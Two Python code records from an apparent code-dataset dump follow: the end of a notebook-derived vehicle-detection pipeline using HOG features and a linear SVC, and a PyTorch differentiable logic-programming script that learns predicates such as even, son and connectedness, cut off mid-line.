vis=True)\n\nimages = [car_image, car_hog_image, notcar_image, notcar_hog_image]\ntitles = ['car image', 'car HOG image', 'notcar_image', 'notcar HOG image']\nfig = plt.figure(figsize=(12,3))\nvisualize(fig, 1, 4, images, titles)\nprint(\"done\")\n\nfor i, img in enumerate(images):\n plt.imsave('output_images/'+titles[i]+'_test.png',images[i]*255)\n\n\n# In[5]:\n\n# Train the Model - only on a subset of samples\n\n#tweak these parameters and see how the results change.\n#color_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n#orient = 6 # HOG orientations\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\n#hog_channel = 0 # Can be 0, 1, 2, or \"ALL\"\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\n#spatial_size = (16, 16) # Spatial binning dimensions\nspatial_size = (32, 32) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n#y_start_stop = [None, None] # Min and max in y to search in slide_window()\n#y_start_stop = [400,656]\n#y_start_stop = [400,724]\n#y_start_stop = [654,656] \n\nt=time.time()\nn_samples = 1000\nrandom_idxs = np.random.randint(0,len(cars), n_samples)\ntest_cars = cars\ntest_notcars = notcars\n#test_cars = np.array(cars)[random_idxs]\n#test_notcars = np.array(notcars)[random_idxs]\n\ncar_features = extract_features(test_cars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(test_notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nprint(time.time()-t, 'Seconds to compute features...')\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(notcar_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\n#X_train, X_test, y_train, y_test = train_test_split(\n# scaled_X, y, test_size=0.2, random_state=rand_state)\nX_train, X_test, y_train, y_test = train_test_split(\n scaled_X, y, test_size=0.1, random_state=rand_state)\n\nprint('Using:',orient,'orientations',pix_per_cell,\n 'pixels per cell and', cell_per_block,'cells per block')\nprint('Feature vector length:', len(X_train[0]))\n# Use a linear SVC \nsvc = LinearSVC()\n# Check the training time for the SVC\nt=time.time()\nsvc.fit(X_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\n\n# In[6]:\n\n# Perform a test on images to see bounding boxes\n\n#%matplotlib inline\nsearchpath = 'test_images/*' \nexample_images = glob.glob(searchpath)\n#searchpath = 'test_images/'\n#example_images = glob.glob(searchpath+'/*')\nimages = []\ntitles = []\n#y_start_stop = [None, None] # Min and max in y to search in slide_window()\ny_start_stop = [400,656]\noverlap = 0.5\n#xy_window = 64\nxy_window = 96\n#xy_window = 128\n\nfor img_src in example_images:\n t1 = time.time()\n img = mpimg.imread(img_src)\n draw_img = np.copy(img)\n img = img.astype(np.float32)/255\n print(np.min(img), np.max(img))\n \n windows = slide_window(img, x_start_stop=[None, None], y_start_stop=y_start_stop, \n xy_window=(xy_window, xy_window), xy_overlap=(overlap, overlap))\n\n hot_windows = search_windows(img, windows, svc, X_scaler, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n\n window_img = draw_boxes(draw_img, hot_windows, color=(0, 0, 255), thick=6) \n images.append(window_img)\n titles.append('')\n print(time.time()-t1, 'seconds to process one image searching', len(windows), 'windows')\nfig = plt.figure(figsize=(12,18), dpi=300)\nvisualize(fig, 5, 2, images, titles)\n\n\n# In[7]:\n\n#plt.imshow(window_img)\nfor i, img in enumerate(images):\n plt.imsave('test_images_results/test_bboxes'+str(i+1)+'.png',images[i])\n\n\n# In[8]:\n\n# function for converting color spaces\n\ndef convert_color(img, conv='RGB2YCrCb'):\n if conv == 'RGB2YCrCb':\n return cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n if conv == 'BGR2YCrCb':\n return cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n if conv == 'RGB2LUV':\n return cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n\n\n# In[9]:\n\n# Create a heatmap on test images\n\nout_images = []\nout_maps = []\nout_titles = []\nout_boxes = []\n\nystart = 400\nystop = 656\nscale = 1.5\n#scale = 1\n\nfor img_src in example_images:\n img_boxes = []\n t = time.time()\n count = 0\n img = mpimg.imread(img_src)\n draw_img = np.copy(img)\n \n heatmap = np.zeros_like(img[:,:,0])\n img = img.astype(np.float32)/255\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n \n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n\n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n nxblocks = (ch1.shape[1] // pix_per_cell) - 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - 1\n nfeat_per_block = orient*cell_per_block**2\n window = 64\n nblocks_per_window = (window // pix_per_cell) - 1\n cells_per_step = 2\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n\n for xb in range(nxsteps):\n for yb in range(nysteps):\n count += 1\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n\n #extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel()\n\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n #extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64, 64))\n\n #get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n #scale features and make predictions\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)))\n #test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n\n test_prediction = svc.predict(test_features)\n\n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale) \n win_draw = np.int(window*scale) \n cv2.rectangle(draw_img, (xbox_left, ytop_draw+ystart), (xbox_left+win_draw, ytop_draw+win_draw+ystart),(0,0,255))\n img_boxes.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw, ytop_draw+win_draw+ystart))) \n heatmap[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n\n print(time.time()-t, 'seconds to run, total windows = ', count)\n\n out_images.append(draw_img)\n\n out_titles.append(img_src[-9:-4] + '_org_with_boxes.png')\n out_titles.append(img_src[-9:-4] + '_just_heatmap.png')\n \n\n out_images.append(heatmap)\n out_maps.append(heatmap) \n out_boxes.append(heatmap)\n \nfig = plt.figure(figsize = (12,24))\nvisualize(fig, 8, 2, out_images, out_titles)\n\n\n# In[10]:\n\n#plt.imshow(window_img)\nfor i, img in enumerate(out_images):\n plt.imsave('test_images_results/'+out_titles[i],out_images[i])\n\n\n# In[11]:\n\n### Detect Vehicles\n\n#dist_pickle = pickle.load( open(\"svc_pickle.p\", \"rb\" ) )\n#svc = dist_pickle[\"svc\"]\n#X_scaler = dist_pickle[\"scaler\"]\n#orient = dist_pickle[\"orient\"]\n#pix_per_cell = dist_pickle[\"pix_per_cell\"]\n#cell_per_block = dist_pickle[\"cell_per_block\"]\n#spatial_size = dist_pickle[\"spatial_size\"]\n#hist_bins = dist_pickle[\"hist_bins\"]\n\n#img = mpimg.imread('test_image.jpg')\n\n# Define a single function that can extract features using hog sub-sampling and make predictions\n#def find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins):\ndef find_cars(img, scale):\n \n draw_img = np.copy(img)\n heatmap = np.zeros_like(img[:,:,0])\n img = img.astype(np.float32)/255\n \n img_tosearch = img[ystart:ystop,:,:]\n ctrans_tosearch = convert_color(img_tosearch, conv='RGB2YCrCb')\n if scale != 1:\n imshape = ctrans_tosearch.shape\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\n \n ch1 = ctrans_tosearch[:,:,0]\n ch2 = ctrans_tosearch[:,:,1]\n ch3 = ctrans_tosearch[:,:,2]\n\n # Define blocks and steps as above\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1 \n nfeat_per_block = orient*cell_per_block**2\n \n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\n window = 64\n #nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\n nblocks_per_window = (window // pix_per_cell) - 1\n cells_per_step = 2 # Instead of overlap, define how many cells to step\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step\n \n # Compute individual channel HOG features for the entire image\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, feature_vec=False)\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, feature_vec=False)\n \n for xb in range(nxsteps):\n for yb in range(nysteps):\n ypos = yb*cells_per_step\n xpos = xb*cells_per_step\n # Extract HOG for this patch\n hog_feat1 = hog1[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat2 = hog2[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_feat3 = hog3[ypos:ypos+nblocks_per_window, xpos:xpos+nblocks_per_window].ravel() \n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\n\n xleft = xpos*pix_per_cell\n ytop = ypos*pix_per_cell\n\n # Extract the image patch\n subimg = cv2.resize(ctrans_tosearch[ytop:ytop+window, xleft:xleft+window], (64,64))\n \n # Get color features\n spatial_features = bin_spatial(subimg, size=spatial_size)\n hist_features = color_hist(subimg, nbins=hist_bins)\n\n # Scale features and make a prediction\n test_features = X_scaler.transform(np.hstack((spatial_features, hist_features, hog_features)).reshape(1, -1)) \n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \n test_prediction = svc.predict(test_features)\n \n if test_prediction == 1:\n xbox_left = np.int(xleft*scale)\n ytop_draw = np.int(ytop*scale)\n win_draw = np.int(window*scale)\n #cv2.rectangle(draw_img,(xbox_left, ytop_draw+ystart),(xbox_left+win_draw,ytop_draw+win_draw+ystart),(0,0,255),6) \n cv2.rectangle(draw_img, (xbox_left, ytop_draw+ystart), (xbox_left+win_draw, ytop_draw+win_draw+ystart),(0,0,255))\n img_boxes.append(((xbox_left, ytop_draw+ystart),(xbox_left+win_draw, ytop_draw+win_draw+ystart))) \n heatmap[ytop_draw+ystart:ytop_draw+win_draw+ystart, xbox_left:xbox_left+win_draw] += 1\n\n return draw_img, heatmap\n \n#ystart = 400\n#ystop = 656\n#scale = 1.5\n \n#out_img = find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n\n#plt.imshow(out_img)\n\n\n# In[12]:\n\ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n # Return the image\n return img\n\n\n# In[13]:\n\nout_images = []\nout_maps = []\nystart = 400\nystop = 656\nscale = 1.5\n\nfor img_src in example_images:\n\n img = mpimg.imread(img_src)\n out_img, heat_map = find_cars(img, scale)\n \n threshold = 1\n heat_map = apply_threshold(heat_map, threshold)\n labels = label(heat_map)\n \n #draw bounding boxes on the image\n draw_img = draw_labeled_bboxes(np.copy(img), labels)\n out_images.append(draw_img)\n out_images.append(heat_map)\n# cv2.imwrite('/test_images_results/test1_bbox.jpg',draw_img)\n# cv2.imwrite('/test1_heatmap.jpg',heat_map)\n \nfig = plt.figure(figsize = (12,24))\nvisualize(fig, 8, 2, out_images, out_titles)\n\n\n# In[14]:\n\ndef process_image(img):\n \n out_img, heat_map = find_cars(img, scale)\n threshold = 1\n heat_map = apply_threshold(heat_map, threshold)\n labels = label(heat_map)\n draw_img = draw_labeled_bboxes(np.copy(img), labels)\n return draw_img\n\n\n# In[15]:\n\ntest_output = 'test.mp4'\n#clip = VideoFileClip(\"project_video.mp4\")\nclip = VideoFileClip(\"test_video.mp4\")\ntest_clip = clip.fl_image(process_image) #NOTE: this function expects color images!!\nget_ipython().magic(u'time test_clip.write_videofile(test_output, audio=False)')\n#test_clip.write_videofile(test_output, audio=False)\n\n\n# In[16]:\n\nHTML(\"\"\"\n\n\"\"\".format(test_output))\n\n\n# In[17]:\n\nfinal_output = 'final.mp4'\nclip = VideoFileClip(\"project_video.mp4\")\nfinal_clip = clip.fl_image(process_image) #NOTE: this function expects color images!!\nget_ipython().magic(u'time final_clip.write_videofile(final_output, audio=False)')\n#test_clip.write_videofile(test_output, audio=False)\n\n\n# In[18]:\n\nHTML(\"\"\"\n\n\"\"\".format(final_output))\n\n\n# In[ ]:\n\n\n\n","repo_name":"Kamil-K/Self-Driving-Car","sub_path":"Vehicle_detection/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":33077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2590309158","text":"import numpy\nimport torchtext\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom torchtext.vocab import Vectors, GloVe\nimport torch.nn.functional as F\nimport pdb\nfrom copy import deepcopy\nimport pdb\n\n'''\n## Predecessor\n##------DATA--------\nnum_constants = 10\nbackground_predicates =[0,1]\nintensional_predicates=[2]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\npredecessor_extension = torch.zeros(num_constants,num_constants)\n\n##Target\nsteps = 2\ntarget = Variable(torch.zeros(num_constants,num_constants))\ntarget[1,0] =1\ntarget[2,1] =1\ntarget[3,2] =1\ntarget[4,3] =1\ntarget[5,4] =1\ntarget[6,5] =1\ntarget[7,6] =1\ntarget[8,7] =1\ntarget[9,8] =1\n\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(predecessor_extension)]\n\nnum_rules = 1\nrules_str = [9]\n\n'''\n############ Even/odd\n\n##------DATA--------\nnum_constants = 5\nbackground_predicates =[0,1]\nintensional_predicates=[2,3]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\naux_extension = torch.zeros(1,num_constants).view(-1,1)\neven_extension = torch.zeros(1,num_constants).view(-1,1)\n\n##Target\ntarget = Variable(torch.zeros(1,num_constants)).view(-1,1)\nsteps = 5\neven = [0,2,4]\nfor integer in even:\n target[integer,0]=1\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(aux_extension), Variable(even_extension)]\n\nnum_rules = 3\nrules_str = [1,2,2]\n\n'''\n############### Less-Than\n##------DATA--------\nnum_constants = 10\nbackground_predicates =[0,1]\nintensional_predicates=[2]\n\n##Background Knowledge\nzero_extension = torch.zeros(1,num_constants).view(-1,1)\nzero_extension[0,0] = 1\nsucc_extension = torch.eye(num_constants-1,num_constants-1)\nsucc_extension = torch.cat((torch.zeros(num_constants-1,1),succ_extension),1)\nsucc_extension = torch.cat((succ_extension,torch.zeros(1,num_constants)),0)\n\n#Intensional Predicates\nless_extension = torch.zeros(num_constants, num_constants)\n\n##Target\nsteps = 5\ntarget = Variable(torch.zeros(num_constants, num_constants))\nfor i in range(num_constants):\n for j in range(i):\n target[j,i] = 1\n\nvaluation_init = [Variable(zero_extension), Variable(succ_extension), Variable(less_extension)]\n\n\nnum_rules = 2\nrules_str = [5,3]\n\n#################### Son\nnum_constants = 9\nbackground_predicates =[0,1,2]\nintensional_predicates=[3,4]\n\n##Background Knowledge\nfather_extension = torch.zeros(num_constants,num_constants)\nbrother_extension = torch.zeros(num_constants,num_constants)\nsister_extension = torch.zeros(num_constants,num_constants)\n\nfather_extension[0,1] = 1 \nfather_extension[0,2] = 1 \nfather_extension[3,4] = 1 \nfather_extension[3,5] =\t1\nfather_extension[6,7] = 1 \nfather_extension[6,8] =\t1\nbrother_extension[1,2] = 1 \nbrother_extension[2,1] = 1\nbrother_extension[4,5] = 1 \nsister_extension[5,4] =\t1\nsister_extension[7,8] = 1 \nsister_extension[8,7] =\t1\n\n#Intensional Predicates\naux_extension = torch.zeros(1,num_constants).view(-1,1)\nson_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[1,0] = 1\ntarget[2,0] = 1\ntarget[4,3] = 1\n\nsteps = 2\n\nvaluation_init = [Variable(father_extension), Variable(brother_extension), Variable(sister_extension), Variable(aux_extension), Variable(son_extension)]\n\nnum_rules = 3\nrules_str = [11, 12, 12]\n\n############# Husband Requires Dataset \nnum_rules = 1\nrules_str = [3]\n\n############# Uncle Requires Dataset\nnum_rules = 3\nrules_str = [3,5,5]\n\n####### Relatedness\nnum_constants = 8\nbackground_predicates =[0]\nintensional_predicates=[1,2]\n\n##Background Knowledge\nparent_extension = torch.zeros(num_constants,num_constants)\n\nparent_extension[0,1] = 1\nparent_extension[0,2] = 1\nparent_extension[2,4] = 1 \nparent_extension[2,5] = 1\nparent_extension[3,2] = 1\nparent_extension[6,7] = 1\n\n#Intensional Predicates\naux_extension = torch.zeros(num_constants, num_constants)\nrelated_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = torch.ones(num_constants-2, num_constants-2)\ntarget = torch.cat((target, torch.zeros(2, num_constants -2)), 0)\ntarget = torch.cat((target, torch.zeros(num_constants,2)), 1)\ntarget[6,7] = 1\ntarget[6,6] = 1\ntarget[7,7] = 1\ntarget[7,6] = 1\ntarget = Variable(target)\nsteps = 4\n\nvaluation_init = [Variable(parent_extension), Variable(aux_extension), Variable(related_extension)]\n\n\nnum_rules = 4\nrules_str = [5,3,5,9]\n\n########### Father\nnum_constants = 12\nbackground_predicates =[0,1,2,3]\nintensional_predicates=[4]\n\n##Background Knowledge\nbrother_extension = torch.zeros(num_constants,num_constants)\nhusband_extension = torch.zeros(num_constants,num_constants)\nmother_extension = torch.zeros(num_constants,num_constants)\naunt_extension = torch.zeros(num_constants,num_constants)\n\nmother_extension[0,1] = 1\nbrother_extension[2,1] = 1\nhusband_extension[2,3] = 1\naunt_extension[3,4] = 1\nmother_extension[3,5] = 1\naunt_extension[3,6] = 1\nbrother_extension[7,8] = 1\nhusband_extension[8,9] = 1\nbrother_extension[9,10] = 1\nmother_extension[9,11] = 1\n\n#Intensional Predicates\nfather_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[2,5] = 1\ntarget[8,11] = 1\n\nsteps = 1\n\nvaluation_init = [Variable(brother_extension), Variable(husband_extension), Variable(mother_extension), Variable(aunt_extension), Variable(father_extension)]\n\nnum_rules = 1\nrules_str = [3]\n\n############### Graph connectedness \n\nnum_constants = 4\nbackground_predicates =[0]\nintensional_predicates=[1]\n\n##Background Knowledge\nedge_extension = torch.zeros(num_constants,num_constants)\nedge_extension[0,1] = 1\nedge_extension[1,2] = 1\nedge_extension[2,3] = 1\nedge_extension[1,0] = 1\n\n#Intensional Predicates\nconnected_extension = torch.zeros(num_constants,num_constants)\n\n##Target\ntarget = Variable(torch.zeros(num_constants, num_constants))\ntarget[0,0] = 1\ntarget[0,1] = 1\ntarget[0,2] = 1\ntarget[0,3] = 1\ntarget[1,0] = 1\ntarget[1,1] = 1\ntarget[1,2] = 1\ntarget[1,3] = 1\ntarget[2,3] = 1\n\nsteps = 3\n\nvaluation_init = [Variable(edge_extension), Variable(connected_extension)]\n \nnum_rules = 2\nrules_str = [5, 3]\n\n\nbackground_predicates =[0,1]\nintensional_predicates=[2,3]\n\n##Background Knowledge\nnum_constants = 5\n\nneq_extension = torch.ones(num_constants, num_constants)\nfor i in range(num_constants):\n neq_extension[i,i] = 0\n\nedge_extension = torch.zeros(num_constants, num_constants)\nedge_extension[0,1] = 1\nedge_extension[0,2] = 1\nedge_extension[1,3] = 1\nedge_extension[2,3] = 1\nedge_extension[2,4] = 1\nedge_extension[3,4] = 1\n\n#Intensional Predicates\ntarget_extension = torch.zeros(1, num_constants).view(-1,1)\naux_extension = torch.zeros(num_constants,num_constants)\n\nvaluation_init = [Variable(neq_extension), Variable(edge_extension), Variable(aux_extension), Variable(target_extension)]\n\n##Target\ntarget = Variable(torch.zeros(1,num_constants)).view(-1,1)\ntarget[0,0] = 1\ntarget[2,0] = 1\n\nsteps = 2\n\nnum_rules = 2\nrules_str = [14,3]\n\n'''\n\n## 1 F(x) <-- F(X)\n## 2 F(x)<---F(Z),F(Z,X)\n## 3 F(x,y)<-- F(x,Z),F(Z,Y)\n## 4 F(X) <-- F(X,X)\n## 5 F(X,Y) <-- F(X,Y)\n## 8 F(X,X) <-- F(X)\n\n##----Num tasks\n## 9 F(x,y) <-- F(y,x)\n## 10 F(x,y)<---F(y,Z),F(X,Z)\n## 11 F(x,y)<-- F(y,x),F(x)\n## 12 F(X) <-- F(X,Z)\n## 13 F(X) <-- F(X,Z), F(Z)\n## 14 F(X) <-- F(X,Z), F(X,Z)\n\n\nnum_predicates= len(valuation_init)\nnum_intensional_predicates = len(intensional_predicates)\nnum_feat = num_predicates\n\n\n\n##------FORWARD CHAINING------\ndef decoder_efficient(valuation, step):\n ##Unifications\n rules_aux = torch.cat((noisy_rules[:,:num_feat], noisy_rules[:,num_feat:2*num_feat], noisy_rules[:,2*num_feat:3*num_feat]),0)\n rules_aux = rules_aux.repeat(num_predicates,1)\n embeddings_aux = noisy_embeddings.repeat(1,num_rules*3).view(-1,num_feat) \n unifs = F.cosine_similarity(embeddings_aux, rules_aux).view(num_predicates,-1)\n #unifs = F.pairwise_distance(embeddings_aux, rules_aux).view(num_predicates,-1)\n #unifs = torch.exp(-unifs)\n #unifs_sum = torch.sum(unifs, 0)\n #unifs= unifs/unifs_sum\n \n ##Get_Valuations\n valuation_new = [valuation[i].clone() for i in background_predicates] + \\\n [Variable(torch.zeros(valuation[i].size())) for i in intensional_predicates] \n \n for predicate in intensional_predicates:\n for s in range(num_constants):\n if valuation[predicate].size()[1] == 1:\n max_score = Variable(torch.Tensor([0]))\n for rule in range(num_rules):\n if rules_str[rule] == 1:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,0]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 2:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][:,0],valuation[body2][:,s])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 4:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,s]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 12:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = torch.max(valuation[body1][s,:])\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 13:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][:,0])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 14:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][s,:])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n\n valuation_new[predicate][s,0] = torch.max(valuation[predicate][s,0], max_score)\n else:\n for o in range(num_constants):\n max_score = Variable(torch.Tensor([0]))\n for rule in range(num_rules):\n if rules_str[rule] == 3:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][:,o])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 5:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,o]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 8:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][s,0]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 9:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]\n num = valuation[body1][o,s]\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 10:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] > 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][s,:],valuation[body2][o,:])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n elif rules_str[rule] == 11:\n for body1 in range(num_predicates):\n if valuation[body1].size()[1] > 1:\n for body2 in range(num_predicates):\n if valuation[body2].size()[1] == 1:\n unif = unifs[predicate][rule]*unifs[body1][num_rules+rule]*unifs[body2][2*num_rules+rule]\n num = torch.min(valuation[body1][o,s],valuation[body2][s,0])\n num = torch.max(num)\n score_rule = unif*num\n max_score = torch.max(max_score, score_rule)\n\n\n valuation_new[predicate][s,o] = torch.max(valuation[predicate][s,o], max_score) \n return valuation_new\n \ndef amalgamate(x,y):\n return x + y - x*y\n\n##------SETUP------\nnum_iters = 1200\nlearning_rate = .1\nlearning_rate_rules1=.1\nlearning_rate_rules2=.05\nlearning_rate_rules3=.01\nhyper_epsilon = .0\nhyper_epoch = 30\n\nhyper_epsilon_r = 1.50\nhyper_epoch_r = 60\n\n\n\n\n#embeddings = Variable(torch.rand(num_predicates, num_feat), requires_grad=True)\n#embeddings = 